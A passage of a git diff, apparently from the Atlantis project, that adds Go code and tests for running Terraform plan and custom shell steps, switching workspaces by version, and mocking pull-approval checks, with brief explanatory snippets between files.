+func (mock *MockPullApprovedChecker) VerifyWasCalled(invocationCountMatcher pegomock.Matcher) *VerifierPullApprovedChecker {
+ return &VerifierPullApprovedChecker{mock, invocationCountMatcher, nil}
+}
+
+func (mock *MockPullApprovedChecker) VerifyWasCalledInOrder(invocationCountMatcher pegomock.Matcher, inOrderContext *pegomock.InOrderContext) *VerifierPullApprovedChecker {
+ return &VerifierPullApprovedChecker{mock, invocationCountMatcher, inOrderContext}
+}
+
+type VerifierPullApprovedChecker struct {
+ mock *MockPullApprovedChecker
+ invocationCountMatcher pegomock.Matcher
+ inOrderContext *pegomock.InOrderContext
+}
+
+func (verifier *VerifierPullApprovedChecker) PullIsApproved(baseRepo models.Repo, pull models.PullRequest) *PullApprovedChecker_PullIsApproved_OngoingVerification {
+ params := []pegomock.Param{baseRepo, pull}
+ methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "PullIsApproved", params)
+ return &PullApprovedChecker_PullIsApproved_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations}
+}
+
+type PullApprovedChecker_PullIsApproved_OngoingVerification struct {
+ mock *MockPullApprovedChecker
+ methodInvocations []pegomock.MethodInvocation
+}
+
+func (c *PullApprovedChecker_PullIsApproved_OngoingVerification) GetCapturedArguments() (models.Repo, models.PullRequest) {
+ baseRepo, pull := c.GetAllCapturedArguments()
+ return baseRepo[len(baseRepo)-1], pull[len(pull)-1]
+}
+
+func (c *PullApprovedChecker_PullIsApproved_OngoingVerification) GetAllCapturedArguments() (_param0 []models.Repo, _param1 []models.PullRequest) {
+ params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations)
+ if len(params) > 0 {
+ _param0 = make([]models.Repo, len(params[0]))
+ for u, param := range params[0] {
+ _param0[u] = param.(models.Repo)
+ }
+ _param1 = make([]models.PullRequest, len(params[1]))
+ for u, param := range params[1] {
+ _param1[u] = param.(models.PullRequest)
+ }
+ }
+ return
+}
diff --git a/server/events/runtime/plan_step_runner.go b/server/events/runtime/plan_step_runner.go
new file mode 100644
index 0000000000..00fe94df73
--- /dev/null
+++ b/server/events/runtime/plan_step_runner.go
@@ -0,0 +1,104 @@
+package runtime
+
+import (
+ "fmt"
+ "os"
+ "path/filepath"
+ "strings"
+
+ "github.com/hashicorp/go-version"
+ "github.com/runatlantis/atlantis/server/events/models"
+)
+
+// atlantisUserTFVar is the name of the variable we pass to terraform,
+// containing the VCS username of the user running the command.
+const atlantisUserTFVar = "atlantis_user"
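+// For example, plan commands are run with "-var atlantis_user=<username>".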
+const defaultWorkspace = "default"
+
+type PlanStepRunner struct {
+ TerraformExecutor TerraformExec
+ DefaultTFVersion *version.Version
+}
+
+func (p *PlanStepRunner) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) {
+ tfVersion := p.DefaultTFVersion
+ if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil {
+ tfVersion = ctx.ProjectConfig.TerraformVersion
+ }
+
+	// Switch workspaces if necessary. In versions < 0.9 there is no such
+	// thing as a workspace, so there is nothing to switch.
+ if err := p.switchWorkspace(ctx, path, tfVersion); err != nil {
+ return "", err
+ }
+
+ // todo: move this to a common library
+ planFileName := fmt.Sprintf("%s.tfplan", ctx.Workspace)
+ if ctx.ProjectConfig != nil && ctx.ProjectConfig.Name != nil {
+ planFileName = fmt.Sprintf("%s-%s", *ctx.ProjectConfig.Name, planFileName)
+ }
+ planFile := filepath.Join(path, planFileName)
+ userVar := fmt.Sprintf("%s=%s", atlantisUserTFVar, ctx.User.Username)
+ tfPlanCmd := append(append([]string{"plan", "-refresh", "-no-color", "-out", planFile, "-var", userVar}, extraArgs...), ctx.CommentArgs...)
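+	// The resulting command looks like:
+	// plan -refresh -no-color -out <path>/<workspace>.tfplan -var atlantis_user=<username> [extra args] [comment args]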
+
+	// Check if env/{workspace}.tfvars exists and, if so, include it. This is a
+	// use-case from Hootsuite, where Atlantis was first created; we keep it as
+	// an homage and a favor so they don't need to refactor all their repos.
+ // It's also a nice way to structure your repos to reduce duplication.
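+	// For example, in workspace "staging" this appends
+	// "-var-file env/staging.tfvars" if that file exists.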
+ optionalEnvFile := filepath.Join(path, "env", ctx.Workspace+".tfvars")
+ if _, err := os.Stat(optionalEnvFile); err == nil {
+ tfPlanCmd = append(tfPlanCmd, "-var-file", optionalEnvFile)
+ }
+
+ return p.TerraformExecutor.RunCommandWithVersion(ctx.Log, filepath.Join(path), tfPlanCmd, tfVersion, ctx.Workspace)
+}
+
+// switchWorkspace changes the terraform workspace if necessary and will create
+// it if it doesn't exist. It handles differences between versions.
+func (p *PlanStepRunner) switchWorkspace(ctx models.ProjectCommandContext, path string, tfVersion *version.Version) error {
+ // In versions less than 0.9 there is no support for workspaces.
+ noWorkspaceSupport := MustConstraint("<0.9").Check(tfVersion)
+ // If the user tried to set a specific workspace in the comment but their
+ // version of TF doesn't support workspaces then error out.
+ if noWorkspaceSupport && ctx.Workspace != defaultWorkspace {
+ return fmt.Errorf("terraform version %s does not support workspaces", tfVersion)
+ }
+ if noWorkspaceSupport {
+ return nil
+ }
+
+ // In version 0.9.* the workspace command was called env.
+ workspaceCmd := "workspace"
+ runningZeroPointNine := MustConstraint(">=0.9,<0.10").Check(tfVersion)
+ if runningZeroPointNine {
+ workspaceCmd = "env"
+ }
+
+	// Use `workspace show` to find out what workspace we're currently in. If
+	// we're already in the right workspace then there's no need to switch,
+	// saving us about ten seconds. This command is only available in >= 0.10.
+ if !runningZeroPointNine {
+ workspaceShowOutput, err := p.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, []string{workspaceCmd, "show"}, tfVersion, ctx.Workspace)
+ if err != nil {
+ return err
+ }
+ // If `show` says we're already on this workspace then we're done.
+ if strings.TrimSpace(workspaceShowOutput) == ctx.Workspace {
+ return nil
+ }
+ }
+
+	// Finally, we have to select the workspace, creating it if it doesn't
+	// exist. To find out whether it exists we could either run select and
+	// catch the error, or run list and look for the workspace. Both take
+	// about the same amount of time, so we run select and fall back to
+	// creating the workspace on error.
+ _, err := p.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, []string{workspaceCmd, "select", "-no-color", ctx.Workspace}, tfVersion, ctx.Workspace)
+ if err != nil {
+ // If terraform workspace select fails we run terraform workspace
+ // new to create a new workspace automatically.
+ _, err = p.TerraformExecutor.RunCommandWithVersion(ctx.Log, path, []string{workspaceCmd, "new", "-no-color", ctx.Workspace}, tfVersion, ctx.Workspace)
+ return err
+ }
+ return nil
+}
diff --git a/server/events/runtime/plan_step_runner_test.go b/server/events/runtime/plan_step_runner_test.go
new file mode 100644
index 0000000000..ed10a5090e
--- /dev/null
+++ b/server/events/runtime/plan_step_runner_test.go
@@ -0,0 +1,299 @@
+package runtime_test
+
+import (
+ "io/ioutil"
+ "os"
+ "path/filepath"
+ "testing"
+
+ "github.com/hashicorp/go-version"
+ . "github.com/petergtz/pegomock"
+ "github.com/pkg/errors"
+ "github.com/runatlantis/atlantis/server/events/mocks/matchers"
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/events/runtime"
+ "github.com/runatlantis/atlantis/server/events/terraform/mocks"
+ matchers2 "github.com/runatlantis/atlantis/server/events/terraform/mocks/matchers"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ "github.com/runatlantis/atlantis/server/logging"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+func TestRun_NoWorkspaceIn08(t *testing.T) {
+ // We don't want any workspace commands to be run in 0.8.
+ RegisterMockTestingT(t)
+ terraform := mocks.NewMockClient()
+
+ tfVersion, _ := version.NewVersion("0.8")
+ logger := logging.NewNoopLogger()
+ workspace := "default"
+ s := runtime.PlanStepRunner{
+ DefaultTFVersion: tfVersion,
+ TerraformExecutor: terraform,
+ }
+
+ When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
+ ThenReturn("output", nil)
+ output, err := s.Run(models.ProjectCommandContext{
+ Log: logger,
+ CommentArgs: []string{"comment", "args"},
+ Workspace: workspace,
+ RepoRelDir: ".",
+ User: models.User{Username: "username"},
+ }, []string{"extra", "args"}, "/path")
+ Ok(t, err)
+
+ Equals(t, "output", output)
+ terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", []string{"plan", "-refresh", "-no-color", "-out", "/path/default.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"}, tfVersion, workspace)
+
+ // Verify that no env or workspace commands were run
+ terraform.VerifyWasCalled(Never()).RunCommandWithVersion(logger, "/path", []string{"env", "select", "-no-color", "workspace"}, tfVersion, workspace)
+ terraform.VerifyWasCalled(Never()).RunCommandWithVersion(logger, "/path", []string{"workspace", "select", "-no-color", "workspace"}, tfVersion, workspace)
+}
+
+func TestRun_ErrWorkspaceIn08(t *testing.T) {
+ // If they attempt to use a workspace other than default in 0.8
+ // we should error.
+ RegisterMockTestingT(t)
+ terraform := mocks.NewMockClient()
+
+ tfVersion, _ := version.NewVersion("0.8")
+ logger := logging.NewNoopLogger()
+ workspace := "notdefault"
+ s := runtime.PlanStepRunner{
+ TerraformExecutor: terraform,
+ DefaultTFVersion: tfVersion,
+ }
+
+ When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
+ ThenReturn("output", nil)
+ _, err := s.Run(models.ProjectCommandContext{
+ Log: logger,
+ Workspace: workspace,
+ RepoRelDir: ".",
+ User: models.User{Username: "username"},
+ }, []string{"extra", "args"}, "/path")
+ ErrEquals(t, "terraform version 0.8.0 does not support workspaces", err)
+}
+
+func TestRun_SwitchesWorkspace(t *testing.T) {
+ RegisterMockTestingT(t)
+
+ cases := []struct {
+ tfVersion string
+ expWorkspaceCmd string
+ }{
+ {
+ "0.9.0",
+ "env",
+ },
+ {
+ "0.9.11",
+ "env",
+ },
+ {
+ "0.10.0",
+ "workspace",
+ },
+ {
+ "0.11.0",
+ "workspace",
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.tfVersion, func(t *testing.T) {
+ terraform := mocks.NewMockClient()
+
+ tfVersion, _ := version.NewVersion(c.tfVersion)
+ logger := logging.NewNoopLogger()
+
+ s := runtime.PlanStepRunner{
+ TerraformExecutor: terraform,
+ DefaultTFVersion: tfVersion,
+ }
+
+ When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())).
+ ThenReturn("output", nil)
+ output, err := s.Run(models.ProjectCommandContext{
+ Log: logger,
+ Workspace: "workspace",
+ RepoRelDir: ".",
+ User: models.User{Username: "username"},
+ CommentArgs: []string{"comment", "args"},
+ }, []string{"extra", "args"}, "/path")
+ Ok(t, err)
+
+ Equals(t, "output", output)
+ // Verify that the workspace (or env) select command was called as well as plan.
+ terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", []string{c.expWorkspaceCmd, "select", "-no-color", "workspace"}, tfVersion, "workspace")
+ terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", []string{"plan", "-refresh", "-no-color", "-out", "/path/workspace.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"}, tfVersion, "workspace")
+ })
+ }
+}
+
+func TestRun_CreatesWorkspace(t *testing.T) {
+ // Test that if `workspace select` fails, we call `workspace new`.
+ RegisterMockTestingT(t)
+
+ cases := []struct {
+ tfVersion string
+ expWorkspaceCommand string
+ }{
+ {
+ "0.9.0",
+ "env",
+ },
+ {
+ "0.9.11",
+ "env",
+ },
+ {
+ "0.10.0",
+ "workspace",
+ },
+ {
+ "0.11.0",
+ "workspace",
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.tfVersion, func(t *testing.T) {
+ terraform := mocks.NewMockClient()
+ tfVersion, _ := version.NewVersion(c.tfVersion)
+ logger := logging.NewNoopLogger()
+ s := runtime.PlanStepRunner{
+ TerraformExecutor: terraform,
+ DefaultTFVersion: tfVersion,
+ }
+
+ // Ensure that we actually try to switch workspaces by making the
+ // output of `workspace show` a different name.
+ When(terraform.RunCommandWithVersion(logger, "/path", []string{"workspace", "show"}, tfVersion, "workspace")).ThenReturn("diffworkspace\n", nil)
+
+ expWorkspaceArgs := []string{c.expWorkspaceCommand, "select", "-no-color", "workspace"}
+ When(terraform.RunCommandWithVersion(logger, "/path", expWorkspaceArgs, tfVersion, "workspace")).ThenReturn("", errors.New("workspace does not exist"))
+
+ expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", "/path/workspace.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"}
+ When(terraform.RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace")).ThenReturn("output", nil)
+
+ output, err := s.Run(models.ProjectCommandContext{
+ Log: logger,
+ Workspace: "workspace",
+ RepoRelDir: ".",
+ User: models.User{Username: "username"},
+ CommentArgs: []string{"comment", "args"},
+ }, []string{"extra", "args"}, "/path")
+ Ok(t, err)
+
+ Equals(t, "output", output)
+ // Verify that the workspace (or env) select command was called as well as plan.
+ terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", expWorkspaceArgs, tfVersion, "workspace")
+ terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace")
+ })
+ }
+}
+
+func TestRun_NoWorkspaceSwitchIfNotNecessary(t *testing.T) {
+ // Tests that if `workspace show` says we're already on the right workspace,
+ // we don't switch.
+ RegisterMockTestingT(t)
+ terraform := mocks.NewMockClient()
+ tfVersion, _ := version.NewVersion("0.10.0")
+ logger := logging.NewNoopLogger()
+ s := runtime.PlanStepRunner{
+ TerraformExecutor: terraform,
+ DefaultTFVersion: tfVersion,
+ }
+ When(terraform.RunCommandWithVersion(logger, "/path", []string{"workspace", "show"}, tfVersion, "workspace")).ThenReturn("workspace\n", nil)
+
+ expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", "/path/workspace.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"}
+ When(terraform.RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace")).ThenReturn("output", nil)
+
+ output, err := s.Run(models.ProjectCommandContext{
+ Log: logger,
+ Workspace: "workspace",
+ RepoRelDir: ".",
+ User: models.User{Username: "username"},
+ CommentArgs: []string{"comment", "args"},
+ }, []string{"extra", "args"}, "/path")
+ Ok(t, err)
+
+ Equals(t, "output", output)
+ terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "workspace")
+
+ // Verify that workspace select was never called.
+ terraform.VerifyWasCalled(Never()).RunCommandWithVersion(logger, "/path", []string{"workspace", "select", "-no-color", "workspace"}, tfVersion, "workspace")
+}
+
+func TestRun_AddsEnvVarFile(t *testing.T) {
+ // Test that if the env/workspace.tfvars file exists, we add the -var-file option.
+ RegisterMockTestingT(t)
+ terraform := mocks.NewMockClient()
+
+ // Create the env/workspace.tfvars file.
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+ err := os.MkdirAll(filepath.Join(tmpDir, "env"), 0700)
+ Ok(t, err)
+ envVarsFile := filepath.Join(tmpDir, "env/workspace.tfvars")
+ err = ioutil.WriteFile(envVarsFile, nil, 0644)
+ Ok(t, err)
+
+ // Using version >= 0.10 here so we don't expect any env commands.
+ tfVersion, _ := version.NewVersion("0.10.0")
+ logger := logging.NewNoopLogger()
+ s := runtime.PlanStepRunner{
+ TerraformExecutor: terraform,
+ DefaultTFVersion: tfVersion,
+ }
+
+ expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", filepath.Join(tmpDir, "workspace.tfplan"), "-var", "atlantis_user=username", "extra", "args", "comment", "args", "-var-file", envVarsFile}
+ When(terraform.RunCommandWithVersion(logger, tmpDir, expPlanArgs, tfVersion, "workspace")).ThenReturn("output", nil)
+
+ output, err := s.Run(models.ProjectCommandContext{
+ Log: logger,
+ Workspace: "workspace",
+ RepoRelDir: ".",
+ User: models.User{Username: "username"},
+ CommentArgs: []string{"comment", "args"},
+ }, []string{"extra", "args"}, tmpDir)
+ Ok(t, err)
+
+ // Verify that env select was never called since we're in version >= 0.10
+ terraform.VerifyWasCalled(Never()).RunCommandWithVersion(logger, tmpDir, []string{"env", "select", "-no-color", "workspace"}, tfVersion, "workspace")
+ terraform.VerifyWasCalledOnce().RunCommandWithVersion(logger, tmpDir, expPlanArgs, tfVersion, "workspace")
+ Equals(t, "output", output)
+}
+
+func TestRun_UsesDiffPathForProject(t *testing.T) {
+ // Test that when running for a named project we use a different path for
+ // the plan file.
+ RegisterMockTestingT(t)
+ terraform := mocks.NewMockClient()
+ tfVersion, _ := version.NewVersion("0.10.0")
+ logger := logging.NewNoopLogger()
+ s := runtime.PlanStepRunner{
+ TerraformExecutor: terraform,
+ DefaultTFVersion: tfVersion,
+ }
+ When(terraform.RunCommandWithVersion(logger, "/path", []string{"workspace", "show"}, tfVersion, "workspace")).ThenReturn("workspace\n", nil)
+
+ expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", "/path/projectname-default.tfplan", "-var", "atlantis_user=username", "extra", "args", "comment", "args"}
+ When(terraform.RunCommandWithVersion(logger, "/path", expPlanArgs, tfVersion, "default")).ThenReturn("output", nil)
+
+ projectName := "projectname"
+ output, err := s.Run(models.ProjectCommandContext{
+ Log: logger,
+ Workspace: "default",
+ RepoRelDir: ".",
+ User: models.User{Username: "username"},
+ CommentArgs: []string{"comment", "args"},
+ ProjectConfig: &valid.Project{
+ Name: &projectName,
+ },
+ }, []string{"extra", "args"}, "/path")
+ Ok(t, err)
+ Equals(t, "output", output)
+}
diff --git a/server/events/runtime/pull_approved_checker.go b/server/events/runtime/pull_approved_checker.go
new file mode 100644
index 0000000000..e77aa2acb1
--- /dev/null
+++ b/server/events/runtime/pull_approved_checker.go
@@ -0,0 +1,11 @@
+package runtime
+
+import (
+ "github.com/runatlantis/atlantis/server/events/models"
+)
+
+//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_pull_approved_checker.go PullApprovedChecker
+
+type PullApprovedChecker interface {
+ PullIsApproved(baseRepo models.Repo, pull models.PullRequest) (bool, error)
+}
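
For callers that don't need call verification, a hand-rolled stub can satisfy this interface instead of the generated pegomock mock. A sketch (the approvedAlways name is illustrative):

package runtime_test

import (
	"github.com/runatlantis/atlantis/server/events/models"
	"github.com/runatlantis/atlantis/server/events/runtime"
)

// approvedAlways reports every pull request as approved.
type approvedAlways struct{}

func (approvedAlways) PullIsApproved(baseRepo models.Repo, pull models.PullRequest) (bool, error) {
	return true, nil
}

// Compile-time check that the stub satisfies the interface.
var _ runtime.PullApprovedChecker = approvedAlways{}
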
diff --git a/server/events/runtime/run_step_runner.go b/server/events/runtime/run_step_runner.go
new file mode 100644
index 0000000000..0bdb7d802b
--- /dev/null
+++ b/server/events/runtime/run_step_runner.go
@@ -0,0 +1,48 @@
+package runtime
+
+import (
+ "fmt"
+ "os"
+ "os/exec"
+ "strings"
+
+ "github.com/hashicorp/go-version"
+ "github.com/pkg/errors"
+ "github.com/runatlantis/atlantis/server/events/models"
+)
+
+// RunStepRunner runs custom commands.
+type RunStepRunner struct {
+ DefaultTFVersion *version.Version
+}
+
+func (r *RunStepRunner) Run(ctx models.ProjectCommandContext, command []string, path string) (string, error) {
+ if len(command) < 1 {
+ return "", errors.New("no commands for run step")
+ }
+
+ cmd := exec.Command("sh", "-c", strings.Join(command, " ")) // #nosec
+ cmd.Dir = path
+ tfVersion := r.DefaultTFVersion.String()
+ if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil {
+ tfVersion = ctx.ProjectConfig.TerraformVersion.String()
+ }
+ baseEnvVars := os.Environ()
+ customEnvVars := []string{
+ fmt.Sprintf("WORKSPACE=%s", ctx.Workspace),
+ fmt.Sprintf("ATLANTIS_TERRAFORM_VERSION=%s", tfVersion),
+ fmt.Sprintf("DIR=%s", path),
+ }
+ finalEnvVars := append(baseEnvVars, customEnvVars...)
+ cmd.Env = finalEnvVars
+ out, err := cmd.CombinedOutput()
+
+ commandStr := strings.Join(command, " ")
+ if err != nil {
+ err = fmt.Errorf("%s: running %q in %q: \n%s", err, commandStr, path, out)
+ ctx.Log.Debug("error: %s", err)
+ return string(out), err
+ }
+ ctx.Log.Info("successfully ran %q in %q", commandStr, path)
+ return string(out), nil
+}
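
Because the step's words are joined into a single string and run through `sh -c`, shell features like `&&`, redirection, and env-var references work, which the tests below rely on. A standalone sketch of that pattern (values are illustrative):

package main

import (
	"fmt"
	"os"
	"os/exec"
)

func main() {
	// Mirrors RunStepRunner: one shell invocation with the Atlantis
	// context exposed as env vars on top of the parent environment.
	cmd := exec.Command("sh", "-c", "echo workspace=$WORKSPACE dir=$DIR")
	cmd.Dir = os.TempDir()
	cmd.Env = append(os.Environ(),
		"WORKSPACE=default",
		"ATLANTIS_TERRAFORM_VERSION=0.11.0",
		"DIR="+os.TempDir(),
	)
	out, err := cmd.CombinedOutput()
	fmt.Printf("%s err=%v\n", out, err)
}
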
diff --git a/server/events/runtime/run_step_runner_test.go b/server/events/runtime/run_step_runner_test.go
new file mode 100644
index 0000000000..c206e1c491
--- /dev/null
+++ b/server/events/runtime/run_step_runner_test.go
@@ -0,0 +1,77 @@
+package runtime_test
+
+import (
+ "strings"
+ "testing"
+
+ "github.com/hashicorp/go-version"
+ "github.com/runatlantis/atlantis/server/events/models"
+ "github.com/runatlantis/atlantis/server/events/runtime"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ "github.com/runatlantis/atlantis/server/logging"
+ . "github.com/runatlantis/atlantis/testing"
+)
+
+func TestRunStepRunner_Run(t *testing.T) {
+ cases := []struct {
+ Command string
+ ExpOut string
+ ExpErr string
+ }{
+ {
+ Command: "",
+ ExpErr: "no commands for run step",
+ },
+ {
+ Command: "echo hi",
+ ExpOut: "hi\n",
+ },
+ {
+ Command: "echo hi >> file && cat file",
+ ExpOut: "hi\n",
+ },
+ {
+ Command: "lkjlkj",
+ ExpErr: "exit status 127: running \"lkjlkj\" in",
+ },
+ {
+ Command: "echo workspace=$WORKSPACE version=$ATLANTIS_TERRAFORM_VERSION dir=$DIR",
+ ExpOut: "workspace=myworkspace version=0.11.0 dir=$DIR\n",
+ },
+ }
+
+ projVersion, err := version.NewVersion("v0.11.0")
+ Ok(t, err)
+ defaultVersion, _ := version.NewVersion("0.8")
+ r := runtime.RunStepRunner{
+ DefaultTFVersion: defaultVersion,
+ }
+ ctx := models.ProjectCommandContext{
+ Log: logging.NewNoopLogger(),
+ Workspace: "myworkspace",
+ RepoRelDir: "mydir",
+ ProjectConfig: &valid.Project{
+ TerraformVersion: projVersion,
+ Workspace: "myworkspace",
+ Dir: "mydir",
+ },
+ }
+ for _, c := range cases {
+ t.Run(c.Command, func(t *testing.T) {
+ tmpDir, cleanup := TempDir(t)
+ defer cleanup()
+ var split []string
+ if c.Command != "" {
+ split = strings.Split(c.Command, " ")
+ }
+ out, err := r.Run(ctx, split, tmpDir)
+ if c.ExpErr != "" {
+ ErrContains(t, c.ExpErr, err)
+ return
+ }
+ Ok(t, err)
+ expOut := strings.Replace(c.ExpOut, "dir=$DIR", "dir="+tmpDir, -1)
+ Equals(t, expOut, out)
+ })
+ }
+}
diff --git a/server/events/runtime/runtime.go b/server/events/runtime/runtime.go
new file mode 100644
index 0000000000..8e599ff659
--- /dev/null
+++ b/server/events/runtime/runtime.go
@@ -0,0 +1,22 @@
+// Package runtime handles constructing an execution graph for each action
+// based on configuration and defaults. The handlers can then execute this
+// graph.
+package runtime
+
+import (
+ "github.com/hashicorp/go-version"
+ "github.com/runatlantis/atlantis/server/logging"
+)
+
+type TerraformExec interface {
+ RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error)
+}
+
+// MustConstraint returns a constraint. It panics on error.
+func MustConstraint(constraint string) version.Constraints {
+ c, err := version.NewConstraint(constraint)
+ if err != nil {
+ panic(err)
+ }
+ return c
+}
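
A usage sketch of MustConstraint with the go-version library; the constraint string mirrors the zeroPointNine constraint that is removed from terraform_client.go below:

package main

import (
	"fmt"

	"github.com/hashicorp/go-version"
	"github.com/runatlantis/atlantis/server/events/runtime"
)

func main() {
	// Build the constraint once (panics on a bad string), then check
	// candidate versions against it.
	zeroPointNine := runtime.MustConstraint(">=0.9,<0.10")
	v, _ := version.NewVersion("0.9.11")
	fmt.Println(zeroPointNine.Check(v)) // true
}
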
diff --git a/server/events/terraform/terraform_client.go b/server/events/terraform/terraform_client.go
index de3d6d23a4..b34516c7c7 100644
--- a/server/events/terraform/terraform_client.go
+++ b/server/events/terraform/terraform_client.go
@@ -32,7 +32,6 @@ import (
type Client interface {
Version() *version.Version
RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error)
- Init(log *logging.SimpleLogger, path string, workspace string, extraInitArgs []string, version *version.Version) ([]string, error)
}
type DefaultClient struct {
@@ -43,20 +42,16 @@ type DefaultClient struct {
const terraformPluginCacheDirName = "plugin-cache"
// zeroPointNine constrains the version to be 0.9.*
-var zeroPointNine = MustConstraint(">=0.9,<0.10")
var versionRegex = regexp.MustCompile("Terraform v(.*)\n")
func NewClient(dataDir string) (*DefaultClient, error) {
- // todo: use exec.LookPath to find out if we even have terraform rather than
- // parsing the error looking for a not found error.
+ _, err := exec.LookPath("terraform")
+ if err != nil {
+ return nil, errors.New("terraform not found in $PATH. \n\nDownload terraform from https://www.terraform.io/downloads.html")
+ }
versionCmdOutput, err := exec.Command("terraform", "version").CombinedOutput() // #nosec
output := string(versionCmdOutput)
if err != nil {
- // exec.go line 35, Error() returns
- // "exec: " + strconv.Quote(e.Name) + ": " + e.Err.Error()
- if err.Error() == fmt.Sprintf("exec: \"terraform\": %s", exec.ErrNotFound.Error()) {
- return nil, errors.New("terraform not found in $PATH. \n\nDownload terraform from https://www.terraform.io/downloads.html")
- }
return nil, errors.Wrapf(err, "running terraform version: %s", output)
}
match := versionRegex.FindStringSubmatch(output)
@@ -87,35 +82,39 @@ func (c *DefaultClient) Version() *version.Version {
}
// RunCommandWithVersion executes the provided version of terraform with
-// the provided args in path. v is the version of terraform executable to use
-// and workspace is the workspace specified by the user commenting
-// "atlantis plan/apply {workspace}" which is set to "default" by default.
+// the provided args in path. v is the version of terraform executable to use.
+// If v is nil, will use the default version.
+// Workspace is the terraform workspace to run in. We won't switch workspaces
+// but will set the WORKSPACE environment variable.
func (c *DefaultClient) RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error) {
tfExecutable := "terraform"
+ tfVersionStr := c.defaultVersion.String()
// if version is the same as the default, don't need to prepend the version name to the executable
- if !v.Equal(c.defaultVersion) {
+ if v != nil && !v.Equal(c.defaultVersion) {
tfExecutable = fmt.Sprintf("%s%s", tfExecutable, v.String())
+ tfVersionStr = v.String()
}
- // set environment variables
- // this is to support scripts to use the WORKSPACE, ATLANTIS_TERRAFORM_VERSION
- // and DIR variables in their scripts
- // append current process's environment variables
- // this is to prevent the $PATH variable being removed from the environment
+ // We add custom variables so that if `extra_args` is specified with env
+ // vars then they'll be substituted.
envVars := []string{
// Will de-emphasize specific commands to run in output.
"TF_IN_AUTOMATION=true",
// Cache plugins so terraform init runs faster.
fmt.Sprintf("TF_PLUGIN_CACHE_DIR=%s", c.terraformPluginCacheDir),
fmt.Sprintf("WORKSPACE=%s", workspace),
- fmt.Sprintf("ATLANTIS_TERRAFORM_VERSION=%s", v.String()),
+ fmt.Sprintf("ATLANTIS_TERRAFORM_VERSION=%s", tfVersionStr),
fmt.Sprintf("DIR=%s", path),
}
+ // Append the current Atlantis process's environment variables so that PATH
+ // is preserved, along with any vars the user purposely started Atlantis with.
envVars = append(envVars, os.Environ()...)
// append terraform executable name with args
tfCmd := fmt.Sprintf("%s %s", tfExecutable, strings.Join(args, " "))
+ // We use 'sh -c' so that if extra_args have been specified with env vars,
+ // ex. -var-file=$WORKSPACE.tfvars, then they get substituted.
terraformCmd := exec.Command("sh", "-c", tfCmd) // #nosec
terraformCmd.Dir = path
terraformCmd.Env = envVars
@@ -130,58 +129,6 @@ func (c *DefaultClient) RunCommandWithVersion(log *logging.SimpleLogger, path st
return string(out), nil
}
-// Init executes "terraform init" and "terraform workspace select" in path.
-// workspace is the workspace to select and extraInitArgs are additional arguments
-// applied to the init command. version is the terraform version being executed.
-// Init is guaranteed to be called with version >= 0.9 since the init command
-// was only introduced in that version. It properly handles the renaming of the
-// env command to workspace since 0.10.
-//
-// Returns the string outputs of running each command.
-func (c *DefaultClient) Init(log *logging.SimpleLogger, path string, workspace string, extraInitArgs []string, version *version.Version) ([]string, error) {
- var outputs []string
-
- output, err := c.RunCommandWithVersion(log, path, append([]string{"init", "-no-color"}, extraInitArgs...), version, workspace)
- outputs = append(outputs, output)
- if err != nil {
- return outputs, err
- }
-
- workspaceCommand := "workspace"
- runningZeroPointNine := zeroPointNine.Check(version)
- if runningZeroPointNine {
- // In 0.9.* `env` was used instead of `workspace`
- workspaceCommand = "env"
- }
-
- // Use `workspace show` to find out what workspace we're in now. If we're
- // already in the right workspace then no need to switch. This will save us
- // about ten seconds. This command is only available in > 0.10.
- if !runningZeroPointNine {
- workspaceShowOutput, err := c.RunCommandWithVersion(log, path, []string{workspaceCommand, "show"}, version, workspace) // nolint:vetshadow
- outputs = append(outputs, workspaceShowOutput)
- if err != nil {
- return outputs, err
- }
- if strings.TrimSpace(workspaceShowOutput) == workspace {
- return outputs, nil
- }
- }
-
